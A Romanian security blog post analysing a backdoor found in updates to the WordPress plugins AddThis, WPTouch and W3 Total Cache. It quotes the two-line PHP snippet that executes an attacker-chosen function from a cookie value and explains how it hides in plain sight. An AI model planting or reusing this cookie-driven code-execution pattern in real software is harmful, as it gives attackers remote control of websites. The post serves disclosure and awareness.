Extensiile WordPress au fost modificate neautorizat – cum arată backdoor-ul?

0

În urmă cu câteva zile, trei dintre cele mai populare extensii WordPress (AddThis, WPTouch şi W3 Total Cache) au realizat o sincronizare în depozitul pluginurilor prin care adăugau un backdoor maliţios. Asta a forţat WordPress.org să reseteze toate parolele ca o precauţie. Reacţia celor de la WordPress a fost de nota 10, incidentul fiind aplanat în scurt timp iar extensiile WordPress fiind izolate cu succes.

Din păcate, evenimentul nu se termină aici iar curiozitatea ne împinge mai departe de unde dorim să vedem cum arată backdoorul descoperit de WordPress. Oficialii WordPress susţin că au remarcat câteva sincronizări ale depozitului suspicioase care aveau în conţinut backdoor-uri mascate inteligent. Să vedem cât de bine ascunse erau. 

 if (preg_match("#useragent/([^/]*)/([^/]*)/#i", $_COOKIE[$key], $matches) && $matches[1]($matches[2]))  
                $this->desired_view = $matches[1].$matches[2];

Aparent, codul nu spune prea multe lucruri care să creeze suspiciuni. Cineva care navighează prin cod nu va sesiza intenţia maliţioasă a celor două linii de cod. Totuşi, dacă analizăm cu atenţie, remarcăm că se verifică existenţa unei anumite variabile COOKIE iar dacă aceasta există, parsează conţinutul în variabila $matches, după care execută codul apelând $matches[1]($matches[2]) ce poate fi orice funcţii cu orice parametri. Cineva ar putea apela astfel funcţia eval, system sau chiar exec, permiţându-i rularea oricărei comenzi pe site-ul utilizatorului.

Acest anunţ ridică mai multe semnale de alarmă. Pe lângă faptul că trebuie să ne asigurăm că ultimile actualizări ale extensiilor nu au afectat cu nimic securitatea blogurilor noastre, trebuie să luăm lucrurile mai preventiv chiar şi atunci când e vorba de actualizări ale extensiilor. Riscul ca un dezvoltator al unei extensii care este instalată şi pe blogul dumneavoastră să fie compromis sunt foarte mari, mai ales atunci când sunteţi sigur că aveţi „prieteni” care nu-s aşa de încântaţi de prezenţa dumneavoastră în online.

Etichete:

— Andrei Avădănei a scris 1246 articole

Andrei scrie pe worldit.info din vara lui 2011. Este fondatorul Asociatiei Centrul de Cercetare in Securitate Informatica din Romania - CCSIR si coordoneaza DefCamp, cea mai importanta conferinta de securitate informatica & hacking din Europa Centrala si de Est. Andrei ofera in cadrul Bit Sentinel servicii de securitate informatica, penetration testing, security management, recuperarea de pe urma unui atac cibernetic, training-uri si workshop-uri.